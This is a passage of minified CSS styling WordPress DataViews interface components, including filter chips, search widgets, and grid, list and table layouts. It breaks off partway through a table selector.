.dataviews-filters__summary-chip:focus-visible,.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip:hover:not(.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip.is-not-clickable),.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip[aria-expanded=true]{background:#e0e0e0;color:#1e1e1e}.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip.has-values{background:rgba(var(--wp-admin-theme-color--rgb),.04);color:var(--wp-admin-theme-color)}.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip.has-values:hover,.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip.has-values[aria-expanded=true]{background:rgba(var(--wp-admin-theme-color--rgb),.12)}.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip:focus-visible{box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color);outline:none}.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip .dataviews-filters-__summary-filter-text-name{font-weight:500}.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip-remove{align-items:center;background:#0000;border:0;border-radius:50%;cursor:pointer;display:flex;height:24px;justify-content:center;padding:0;position:absolute;right:4px;top:50%;transform:translateY(-50%);width:24px}.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip-remove svg{fill:#757575}.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip-remove:focus,.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip-remove:hover{background:#e0e0e0}.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip-remove:focus svg,.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip-remove:hover svg{fill:#1e1e1e}.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip-remove.has-values svg{fill:var(--wp-admin-theme-color)}.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip-remove.has-values:hover{background:rgba(var(--wp-admin-theme-color--rgb),.08)}.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip-remove:focus-visible{box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color);outline:none}.dataviews-filters__search-widget-filter-combobox-list{border-top:1px solid #e0e0e0;max-height:184px;overflow:auto;padding:4px}.dataviews-filters__search-widget-filter-combobox-list .dataviews-filters__search-widget-filter-combobox-item-value [data-user-value]{font-weight:600}.dataviews-filters__search-widget-listbox{overflow:auto;padding:4px}.dataviews-filters__search-widget-listitem{align-items:center;border-radius:2px;box-sizing:border-box;cursor:default;display:flex;font-family:-apple-system,"system-ui",Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:13px;font-weight:400;gap:8px;line-height:20px;min-height:32px;padding:4px 12px}.dataviews-filters__search-widget-listitem:last-child{margin-block-end:0}.dataviews-filters__search-widget-listitem:focus,.dataviews-filters__search-widget-listitem:hover,.dataviews-filters__search-widget-listitem[data-active-item]{background-color:var(--wp-admin-theme-color);color:#fff}.dataviews-filters__search-widget-listitem:focus .dataviews-filters__search-widget-listitem-description,.dataviews-filters__search-widget-listitem:hover .dataviews-filters__search-widget-listitem-description,.dataviews-filters__search-widget-listitem[data-active-item] .dataviews-filters__search-widget-listitem-description{color:#fff}.dataviews-filters__search-widget-listitem:focus .dataviews-filters__search-widget-listitem-single-selection,.dataviews-filters__search-widget-listitem:hover .dataviews-filters__search-widget-listitem-single-selection,.dataviews-filters__search-widget-listitem[data-active-item] .dataviews-filters__search-widget-listitem-single-selection{background:#fff;border-color:var(--wp-admin-theme-color-darker-20,#183ad6)}.dataviews-filters__search-widget-listitem:focus .dataviews-filters__search-widget-listitem-single-selection.is-selected,.dataviews-filters__search-widget-listitem:hover .dataviews-filters__search-widget-listitem-single-selection.is-selected,.dataviews-filters__search-widget-listitem[data-active-item] .dataviews-filters__search-widget-listitem-single-selection.is-selected{background:var(--wp-admin-theme-color-darker-20,#183ad6);border-color:var(--wp-admin-theme-color-darker-20,#183ad6)}.dataviews-filters__search-widget-listitem:focus .dataviews-filters__search-widget-listitem-multi-selection,.dataviews-filters__search-widget-listitem:hover .dataviews-filters__search-widget-listitem-multi-selection,.dataviews-filters__search-widget-listitem[data-active-item] .dataviews-filters__search-widget-listitem-multi-selection{border-color:var(--wp-admin-theme-color-darker-20,#183ad6)}.dataviews-filters__search-widget-listitem:focus .dataviews-filters__search-widget-listitem-multi-selection.is-selected,.dataviews-filters__search-widget-listitem:hover .dataviews-filters__search-widget-listitem-multi-selection.is-selected,.dataviews-filters__search-widget-listitem[data-active-item] .dataviews-filters__search-widget-listitem-multi-selection.is-selected{background:var(--wp-admin-theme-color-darker-20,#183ad6);border-color:var(--wp-admin-theme-color-darker-20,#183ad6)}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-description{color:#757575;display:block;font-size:12px;line-height:16px;overflow:hidden;text-overflow:ellipsis}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection{border:1px solid #1e1e1e;border-radius:50%;height:24px;margin-right:12px;max-width:24px;min-width:24px;position:relative;transition:none;width:24px}@media not (prefers-reduced-motion){.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection{transition:box-shadow .1s linear}}@media (min-width:600px){.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection{height:16px;max-width:16px;min-width:16px;width:16px}}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection:checked:before{background-color:#fff;border:4px solid #fff;box-sizing:inherit;height:12px;left:50%;margin:0;position:absolute;top:50%;transform:translate(-50%,-50%);width:12px}@media (min-width:600px){.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection:checked:before{height:8px;width:8px}}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection:focus{box-shadow:0 0 0 2px #fff,0 0 0 4px var(--wp-admin-theme-color);outline:2px solid #0000}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection:checked{background:var(--wp-admin-theme-color);border:none}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection{margin:0;padding:0}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection.is-selected{background:var(--wp-admin-theme-color,#3858e9);border-color:var(--wp-admin-theme-color,#3858e9)}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection.is-selected:before{background-color:#fff;border:4px solid #fff;border-radius:50%;box-sizing:inherit;content:"";height:12px;left:50%;margin:0;position:absolute;top:50%;transform:translate(-50%,-50%);width:12px}@media (min-width:600px){.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection.is-selected:before{height:8px;width:8px}}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection{--checkbox-size:24px;border:1px solid #949494;border-radius:2px;box-shadow:0 0 0 #0000;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:16px;line-height:normal;margin-right:12px;padding:6px 8px;transition:none}@media not (prefers-reduced-motion){.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection{transition:box-shadow .1s linear}}@media (min-width:600px){.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection{font-size:13px;line-height:normal}}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection:focus{border-color:var(--wp-admin-theme-color);box-shadow:0 0 0 .5px var(--wp-admin-theme-color)}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection::-webkit-input-placeholder{color:#1e1e1e9e}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection::-moz-placeholder{color:#1e1e1e9e}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection:-ms-input-placeholder{color:#1e1e1e9e}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection:focus{box-shadow:0 0 0 2px #fff,0 0 0 4px var(--wp-admin-theme-color);outline:2px solid #0000}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection:checked{background:var(--wp-admin-theme-color);border-color:var(--wp-admin-theme-color)}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection:checked::-ms-check{opacity:0}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection:checked:before,.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection[aria-checked=mixed]:before{color:#fff;margin:-3px -5px}@media (min-width:782px){.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection:checked:before,.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection[aria-checked=mixed]:before{margin:-4px 0 0 -5px}}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection[aria-checked=mixed]{background:var(--wp-admin-theme-color);border-color:var(--wp-admin-theme-color)}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection[aria-checked=mixed]:before{content:"\f460";display:inline-block;float:left;font:normal 30px/1 dashicons;vertical-align:middle;width:16px;speak:none;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}@media (min-width:782px){.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection[aria-checked=mixed]:before{float:none;font-size:21px}}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection:disabled,.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection[aria-disabled=true]{background:#f0f0f0;border-color:#ddd;cursor:default;opacity:1}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection{background:#fff;color:#1e1e1e;height:var(--checkbox-size);margin:0;padding:0;position:relative;width:var(--checkbox-size)}@media (min-width:600px){.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection{--checkbox-size:16px}}@media not (prefers-reduced-motion){.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection{transition:border-color .1s ease-in-out}}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection.is-selected{background:var(--wp-admin-theme-color,#3858e9);border-color:var(--wp-admin-theme-color,#3858e9)}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection.is-selected svg{--checkmark-size:var(--checkbox-size);fill:#fff;height:var(--checkmark-size);left:50%;position:absolute;top:50%;transform:translate(-50%,-50%);width:var(--checkmark-size)}@media (min-width:600px){.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection.is-selected svg{--checkmark-size:calc(var(--checkbox-size) + 4px)}}.dataviews-filters__search-widget-filter-combobox__wrapper{padding:8px;position:relative}.dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input{border:1px solid #949494;border-radius:2px;box-shadow:0 0 0 #0000;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;line-height:normal;padding:6px 8px}@media not (prefers-reduced-motion){.dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input{transition:box-shadow .1s linear}}@media (min-width:600px){.dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input{font-size:13px;line-height:normal}}.dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input:focus{border-color:var(--wp-admin-theme-color);box-shadow:0 0 0 .5px var(--wp-admin-theme-color);outline:2px solid #0000}.dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input::-webkit-input-placeholder{color:#1e1e1e9e}.dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input::-moz-placeholder{color:#1e1e1e9e}.dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input:-ms-input-placeholder{color:#1e1e1e9e}.dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input{display:block;font-size:16px;height:32px;margin-left:0;margin-right:0;padding:0 8px 0 32px;width:100%}@media (min-width:600px){.dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input{font-size:13px}}.dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input:focus{background:#fff;box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color)}.dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input::placeholder{color:#757575}.dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input::-webkit-search-cancel-button,.dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input::-webkit-search-decoration,.dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input::-webkit-search-results-button,.dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input::-webkit-search-results-decoration{-webkit-appearance:none}.dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__icon{align-items:center;bottom:0;display:flex;inset-inline-start:12px;justify-content:center;position:absolute;top:0;width:24px}.dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__icon:dir(ltr){transform:scaleX(-1)}.dataviews-filters__container-visibility-toggle{flex-shrink:0;position:relative}.dataviews-filters-toggle__count{background:var(--wp-admin-theme-color,#3858e9);border-radius:8px;box-sizing:border-box;color:#fff;font-size:11px;height:16px;line-height:16px;min-width:16px;outline:var(--wp-admin-border-width-focus) solid #fff;padding:0 4px;position:absolute;right:0;text-align:center;top:0;transform:translate(50%,-50%)}.dataviews-search{width:fit-content}.dataviews-filters__user-input-widget{padding:16px}.dataviews-filters__user-input-widget .components-input-control__prefix{padding-left:8px}.dataviews-filters__search-widget-no-elements{align-items:center;display:flex;justify-content:center;padding:16px}.dataviews-footer{background-color:#fff;border-top:1px solid #f0f0f0;bottom:0;flex-shrink:0;left:0;padding:12px 48px;position:sticky}@media not (prefers-reduced-motion){.dataviews-footer{transition:padding .1s ease-out}}.dataviews-footer{z-index:2}@container (max-width: 430px){.dataviews-footer{padding:12px 24px}}@container (max-width: 560px){.dataviews-footer{flex-direction:column!important}.dataviews-footer .dataviews-bulk-actions-footer__container{width:100%}.dataviews-footer .dataviews-bulk-actions-footer__item-count{flex-grow:1}.dataviews-footer .dataviews-pagination{justify-content:space-between;width:100%}}.dataviews-pagination__page-select{font-size:11px;font-weight:500;text-transform:uppercase}@media (min-width:600px){.dataviews-pagination__page-select .components-select-control__input{font-size:11px!important;font-weight:500}}.dataviews-action-modal{z-index:1000001}.dataviews-picker-footer__bulk-selection{align-self:flex-start;height:32px}.dataviews-picker-footer__actions{align-self:flex-end}.dataviews-selection-checkbox{--checkbox-input-size:24px}@media (min-width:600px){.dataviews-selection-checkbox{--checkbox-input-size:16px}}.dataviews-selection-checkbox{flex-shrink:0;line-height:0}.dataviews-selection-checkbox .components-checkbox-control__input-container{margin:0}.dataviews-view-config{container-type:inline-size;font-size:13px;line-height:1.4;width:320px}.dataviews-config__popover.is-expanded .dataviews-config__popover-content-wrapper{height:100%;overflow-y:scroll}.dataviews-config__popover.is-expanded .dataviews-config__popover-content-wrapper .dataviews-view-config{width:auto}.dataviews-view-config__sort-direction .components-toggle-group-control-option-base{text-transform:uppercase}.dataviews-settings-section__title.dataviews-settings-section__title{font-size:15px;line-height:24px}.dataviews-settings-section__sidebar{grid-column:span 4}.dataviews-settings-section__content,.dataviews-settings-section__content>*{grid-column:span 8}.dataviews-settings-section__content .is-divided-in-two{display:contents}.dataviews-settings-section__content .is-divided-in-two>*{grid-column:span 4}.dataviews-settings-section:has(.dataviews-settings-section__content:empty){display:none}@container (max-width: 500px){.dataviews-settings-section.dataviews-settings-section{grid-template-columns:repeat(2,1fr)}.dataviews-settings-section.dataviews-settings-section .dataviews-settings-section__content,.dataviews-settings-section.dataviews-settings-section .dataviews-settings-section__sidebar{grid-column:span 2}}.dataviews-field-control__field{height:32px}.dataviews-field-control__actions{position:absolute;top:-9999em}.dataviews-field-control__actions.dataviews-field-control__actions{gap:4px}.dataviews-field-control__field.is-interacting .dataviews-field-control__actions,.dataviews-field-control__field:focus-within .dataviews-field-control__actions,.dataviews-field-control__field:hover .dataviews-field-control__actions{position:unset;top:unset}.dataviews-field-control__icon{display:flex;width:24px}.dataviews-field-control__label-sub-label-container{flex-grow:1}.dataviews-field-control__label{display:block}.dataviews-field-control__sub-label{color:#757575;font-size:11px;font-style:normal;margin-bottom:0;margin-top:8px}.dataviews-view-grid-items{container-type:inline-size;display:grid;gap:32px;grid-template-columns:repeat(auto-fill,minmax(230px,1fr));grid-template-rows:max-content;margin-bottom:auto;padding:0 48px 24px}@container (max-width: 430px){.dataviews-view-grid-items{padding-left:24px;padding-right:24px}}@media not (prefers-reduced-motion){.dataviews-view-grid-items{transition:padding .1s ease-out}}.dataviews-view-grid .dataviews-view-grid__card{height:100%;justify-content:flex-start;position:relative}.dataviews-view-grid .dataviews-view-grid__card .dataviews-view-grid__title-actions{padding:8px 0 4px}.dataviews-view-grid .dataviews-view-grid__card .dataviews-view-grid__title-field{align-content:center;min-height:24px;overflow:hidden;text-align:start}.dataviews-view-grid .dataviews-view-grid__card .dataviews-view-grid__title-field--clickable{width:fit-content}.dataviews-view-grid .dataviews-view-grid__card.is-selected .dataviews-view-grid__fields .dataviews-view-grid__field .dataviews-view-grid__field-value{color:#1e1e1e}.dataviews-view-grid .dataviews-view-grid__card .dataviews-view-grid__media:focus:after,.dataviews-view-grid .dataviews-view-grid__card.is-selected .dataviews-view-grid__media:after{background-color:rgba(var(--wp-admin-theme-color--rgb),.08)}.dataviews-view-grid .dataviews-view-grid__card.is-selected .dataviews-view-grid__media:after{box-shadow:inset 0 0 0 1px var(--wp-admin-theme-color)}.dataviews-view-grid .dataviews-view-grid__card .dataviews-view-grid__media:focus:after{box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color)}.dataviews-view-grid .dataviews-view-grid__media{aspect-ratio:1/1;background-color:#fff;border-radius:4px;overflow:hidden;position:relative;width:100%}.dataviews-view-grid .dataviews-view-grid__media img{height:100%;object-fit:cover;width:100%}.dataviews-view-grid .dataviews-view-grid__media:after{border-radius:4px;box-shadow:inset 0 0 0 1px #0000001a;content:"";height:100%;left:0;pointer-events:none;position:absolute;top:0;width:100%}.dataviews-view-grid .dataviews-view-grid__fields{font-size:12px;line-height:16px;position:relative}.dataviews-view-grid .dataviews-view-grid__fields:not(:empty){padding:0 0 12px}.dataviews-view-grid .dataviews-view-grid__fields .dataviews-view-grid__field-value:not(:empty){line-height:20px;min-height:24px;padding-top:2px}.dataviews-view-grid .dataviews-view-grid__fields .dataviews-view-grid__field{align-items:center;min-height:24px}.dataviews-view-grid .dataviews-view-grid__fields .dataviews-view-grid__field .dataviews-view-grid__field-name{color:#757575;overflow:hidden;text-overflow:ellipsis;white-space:nowrap;width:35%}.dataviews-view-grid .dataviews-view-grid__fields .dataviews-view-grid__field .dataviews-view-grid__field-value{overflow:hidden;text-overflow:ellipsis;white-space:nowrap;width:65%}.dataviews-view-grid .dataviews-view-grid__fields .dataviews-view-grid__field:not(:has(.dataviews-view-grid__field-value:not(:empty))){display:none}.dataviews-view-grid .dataviews-view-grid__badge-fields:not(:empty){padding-bottom:12px}.dataviews-view-grid__field-value:empty,.dataviews-view-grid__field:empty{display:none}.dataviews-view-grid__card .dataviews-selection-checkbox{left:8px;opacity:0;position:absolute;top:-9999em;z-index:1}@media not (prefers-reduced-motion){.dataviews-view-grid__card .dataviews-selection-checkbox{transition:opacity .1s linear}}@media (hover:none){.dataviews-view-grid__card .dataviews-selection-checkbox{opacity:1;top:8px}}.dataviews-view-grid__card.is-selected .dataviews-selection-checkbox,.dataviews-view-grid__card:focus-within .dataviews-selection-checkbox,.dataviews-view-grid__card:hover .dataviews-selection-checkbox{opacity:1;top:8px}.dataviews-view-grid__card .dataviews-view-grid__media-actions{opacity:0;position:absolute;right:4px;top:4px}.dataviews-view-grid__card .dataviews-view-grid__media-actions .dataviews-all-actions-button{background-color:#fff}@media not (prefers-reduced-motion){.dataviews-view-grid__card .dataviews-view-grid__media-actions{transition:opacity .1s linear}}@media (hover:none){.dataviews-view-grid__card .dataviews-view-grid__media-actions{opacity:1;top:4px}}.dataviews-view-grid__card .dataviews-view-grid__media-actions:has(.dataviews-all-actions-button[aria-expanded=true]),.dataviews-view-grid__card:focus-within .dataviews-view-grid__media-actions,.dataviews-view-grid__card:hover .dataviews-view-grid__media-actions{opacity:1}.dataviews-view-grid__media--clickable{cursor:pointer}.dataviews-view-grid__group-header{color:#1e1e1e;container-type:inline-size;font-size:15px;font-weight:500;margin:0 0 8px;padding:0 48px}@container (max-width: 430px){.dataviews-view-grid__group-header{padding-left:24px;padding-right:24px}}div.dataviews-view-list{list-style-type:none}.dataviews-view-list{margin:0 0 auto}.dataviews-view-list div[role=article],.dataviews-view-list div[role=row]{border-top:1px solid #f0f0f0;margin:0}.dataviews-view-list div[role=article] .dataviews-view-list__item-wrapper,.dataviews-view-list div[role=row] .dataviews-view-list__item-wrapper{box-sizing:border-box;padding:16px 24px;position:relative}.dataviews-view-list div[role=article] .dataviews-view-list__item-actions,.dataviews-view-list div[role=row] .dataviews-view-list__item-actions{display:flex;flex:0 0 auto;gap:4px;white-space:nowrap;width:max-content}.dataviews-view-list div[role=article] .dataviews-view-list__item-actions .components-button,.dataviews-view-list div[role=row] .dataviews-view-list__item-actions .components-button{position:relative;z-index:1}.dataviews-view-list div[role=article] .dataviews-view-list__item-actions>div,.dataviews-view-list div[role=row] .dataviews-view-list__item-actions>div{height:24px}.dataviews-view-list div[role=article] .dataviews-view-list__item-actions>:not(:last-child),.dataviews-view-list div[role=row] .dataviews-view-list__item-actions>:not(:last-child){flex:0;overflow:hidden;width:0}.dataviews-view-list div[role=article]:where(.is-selected,.is-hovered,:focus-within) .dataviews-view-list__item-actions>:not(:last-child),.dataviews-view-list div[role=row]:where(.is-selected,.is-hovered,:focus-within) .dataviews-view-list__item-actions>:not(:last-child){flex-basis:min-content;overflow:unset;width:auto}@media (hover:none){.dataviews-view-list div[role=article] .dataviews-view-list__item-actions>:not(:last-child),.dataviews-view-list div[role=row] .dataviews-view-list__item-actions>:not(:last-child){flex-basis:min-content;overflow:unset;width:auto}}.dataviews-view-list div[role=article].is-selected.is-selected,.dataviews-view-list div[role=article].is-selected.is-selected+div[role=article],.dataviews-view-list div[role=article].is-selected.is-selected+div[role=row],.dataviews-view-list div[role=row].is-selected.is-selected,.dataviews-view-list div[role=row].is-selected.is-selected+div[role=article],.dataviews-view-list div[role=row].is-selected.is-selected+div[role=row]{border-top:1px solid rgba(var(--wp-admin-theme-color--rgb),.12)}.dataviews-view-list div[role=article]:not(.is-selected) .dataviews-view-list__title-field,.dataviews-view-list div[role=row]:not(.is-selected) .dataviews-view-list__title-field{color:#1e1e1e}.dataviews-view-list div[role=article]:not(.is-selected).is-hovered,.dataviews-view-list div[role=article]:not(.is-selected):focus-within,.dataviews-view-list div[role=article]:not(.is-selected):hover,.dataviews-view-list div[role=row]:not(.is-selected).is-hovered,.dataviews-view-list div[role=row]:not(.is-selected):focus-within,.dataviews-view-list div[role=row]:not(.is-selected):hover{background-color:#f8f8f8;color:var(--wp-admin-theme-color)}.dataviews-view-list div[role=article]:not(.is-selected).is-hovered .dataviews-view-list__fields,.dataviews-view-list div[role=article]:not(.is-selected).is-hovered .dataviews-view-list__title-field,.dataviews-view-list div[role=article]:not(.is-selected):focus-within .dataviews-view-list__fields,.dataviews-view-list div[role=article]:not(.is-selected):focus-within .dataviews-view-list__title-field,.dataviews-view-list div[role=article]:not(.is-selected):hover .dataviews-view-list__fields,.dataviews-view-list div[role=article]:not(.is-selected):hover .dataviews-view-list__title-field,.dataviews-view-list div[role=row]:not(.is-selected).is-hovered .dataviews-view-list__fields,.dataviews-view-list div[role=row]:not(.is-selected).is-hovered .dataviews-view-list__title-field,.dataviews-view-list div[role=row]:not(.is-selected):focus-within .dataviews-view-list__fields,.dataviews-view-list div[role=row]:not(.is-selected):focus-within .dataviews-view-list__title-field,.dataviews-view-list div[role=row]:not(.is-selected):hover .dataviews-view-list__fields,.dataviews-view-list div[role=row]:not(.is-selected):hover .dataviews-view-list__title-field{color:var(--wp-admin-theme-color)}.dataviews-view-list div[role=article].is-selected .dataviews-view-list__item-wrapper,.dataviews-view-list div[role=article].is-selected:focus-within .dataviews-view-list__item-wrapper,.dataviews-view-list div[role=row].is-selected .dataviews-view-list__item-wrapper,.dataviews-view-list div[role=row].is-selected:focus-within .dataviews-view-list__item-wrapper{background-color:rgba(var(--wp-admin-theme-color--rgb),.04);color:#1e1e1e}.dataviews-view-list div[role=article].is-selected .dataviews-view-list__item-wrapper .dataviews-view-list__fields,.dataviews-view-list div[role=article].is-selected .dataviews-view-list__item-wrapper .dataviews-view-list__title-field,.dataviews-view-list div[role=article].is-selected:focus-within .dataviews-view-list__item-wrapper .dataviews-view-list__fields,.dataviews-view-list div[role=article].is-selected:focus-within .dataviews-view-list__item-wrapper .dataviews-view-list__title-field,.dataviews-view-list div[role=row].is-selected .dataviews-view-list__item-wrapper .dataviews-view-list__fields,.dataviews-view-list div[role=row].is-selected .dataviews-view-list__item-wrapper .dataviews-view-list__title-field,.dataviews-view-list div[role=row].is-selected:focus-within .dataviews-view-list__item-wrapper .dataviews-view-list__fields,.dataviews-view-list div[role=row].is-selected:focus-within .dataviews-view-list__item-wrapper .dataviews-view-list__title-field{color:var(--wp-admin-theme-color)}.dataviews-view-list .dataviews-view-list__item{appearance:none;background:none;border:none;cursor:pointer;inset:0;padding:0;position:absolute;scroll-margin:8px 0;z-index:1}.dataviews-view-list .dataviews-view-list__item:focus-visible{outline:none}.dataviews-view-list .dataviews-view-list__item:focus-visible:before{border-radius:2px;box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color);content:"";inset:var(--wp-admin-border-width-focus);outline:2px solid #0000;position:absolute}.dataviews-view-list .dataviews-view-list__title-field{flex:1;line-height:24px;min-height:24px;overflow:hidden}.dataviews-view-list .dataviews-view-list__title-field:has(a,button){z-index:1}.dataviews-view-list .dataviews-view-list__media-wrapper{background-color:#fff;border-radius:4px;flex-shrink:0;height:52px;overflow:hidden;position:relative;width:52px}.dataviews-view-list .dataviews-view-list__media-wrapper img{height:100%;object-fit:cover;width:100%}.dataviews-view-list .dataviews-view-list__media-wrapper:after{border-radius:4px;box-shadow:inset 0 0 0 1px #0000001a;content:"";height:100%;left:0;position:absolute;top:0;width:100%}.dataviews-view-list .dataviews-view-list__field-wrapper{flex-grow:1;min-height:52px}.dataviews-view-list .dataviews-view-list__fields{color:#757575;display:flex;flex-wrap:wrap;font-size:12px;gap:12px;row-gap:4px}.dataviews-view-list .dataviews-view-list__fields .dataviews-view-list__field:has(.dataviews-view-list__field-value:empty),.dataviews-view-list .dataviews-view-list__fields:empty{display:none}.dataviews-view-list .dataviews-view-list__fields .dataviews-view-list__field-value{align-items:center;display:flex;line-height:20px;min-height:24px}.dataviews-view-list+.dataviews-pagination{justify-content:space-between}.dataviews-view-list__group-header{color:#1e1e1e;font-size:15px;font-weight:500;margin:0 0 8px;padding:0 24px}.dataviews-view-table{border-collapse:collapse;border-color:inherit;color:#757575;margin-bottom:auto;position:relative;text-indent:0;width:100%}.dataviews-view-table th{color:#1e1e1e;font-size:13px;font-weight:400;text-align:left}.dataviews-view-table td,.dataviews-view-table th{padding:12px}.dataviews-view-table td.dataviews-view-table__actions-column,.dataviews-view-table th.dataviews-view-table__actions-column{text-align:right}.dataviews-view-table td.dataviews-view-table__actions-column--sticky,.dataviews-view-table th.dataviews-view-table__actions-column--sticky{background-color:#fff;position:sticky;right:0}.dataviews-view-table td.dataviews-view-table__actions-column--stuck:after,.dataviews-view-table th.dataviews-view-table__actions-column--stuck:after{background-color:#f0f0f0;bottom:0;content:"";display:block;left:0;position:absolute;top:0;width:1px}.dataviews-view-table td.dataviews-view-table__checkbox-column,.dataviews-view-table th.dataviews-view-table__checkbox-column{padding-right:0}.dataviews-view-table td.dataviews-view-table__checkbox-column .dataviews-view-table__cell-content-wrapper,.dataviews-view-table th.dataviews-view-table__checkbox-column .dataviews-view-table__cell-content-wrapper{max-width:auto;min-width:auto}.dataviews-view-table tr{border-top:1px solid #f0f0f0}.dataviews-view-table tr .dataviews-view-table-header-button{gap:4px}.dataviews-view-table tr td:first-child,.dataviews-view-table tr th:first-child{padding-left:48px}.dataviews-view-table tr td:first-child .dataviews-view-table-header-button,.dataviews-view-table tr th:first-child .dataviews-view-table-header-button{margin-left:-8px}.dataviews-view-table tr td:last-child,.dataviews-view-table tr th:last-child{padding-right:48px}.dataviews-view-table tr:last-child{border-bottom:0}.dataviews-view-table tr.is-hovered,.dataviews-view-table tr.is-hovered .dataviews-view-table__actions-column--sticky{background-color:#f8f8f8}.dataviews-view-table tr .components-checkbox-control__input.components-checkbox-control__input{opacity:0}.dataviews-view-table tr .components-checkbox-control__input.components-checkbox-control__input:checked,.dataviews-view-table tr .components-checkbox-control__input.components-checkbox-control__input:focus,.dataviews-view-table tr .components-checkbox-control__input.components-checkbox-control__input:indeterminate{opacity:1}.dataviews-view-table tr .dataviews-item-actions .components-button:not(.dataviews-all-actions-button){opacity:0}.dataviews-view-table tr.is-hovered 